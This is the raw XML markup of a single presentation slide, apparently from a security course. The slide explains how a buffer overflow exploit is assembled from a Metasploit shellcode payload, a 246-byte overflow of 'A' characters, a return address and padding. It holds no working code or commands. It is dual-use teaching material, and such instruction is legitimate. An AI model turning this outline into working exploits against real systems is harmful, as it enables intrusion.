            <a:endParaRPr sz="2000">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g1e9a65c21fa_51_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="99875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US" sz="3200"/>
              <a:t>Adding the Key Elements of the Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Google Shape;813;g1e9a65c21fa_51_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2958051"/>
            <a:ext cx="11235159" cy="3899949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage is describing the process of creating an exploit for a software vulnerability. The exploit is made up of several key elements, including shell code, an overflow variable, a return address, and a padding variable.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The shell code variable contains the payload created with the Metasploit Framework, which is a set of tools used for developing and executing exploits. The overflow variable is used to overflow the buffer of the vulnerable software. In this case, it contains 246 instances of the letter "A" (\x41 in hex)</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;g1e9a65c21fa_51_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="2380201"/>
            <a:ext cx="5012911"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Explanation for the above passage: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Ch0k0by73</dc:creator>
</cp:coreProperties>
</file>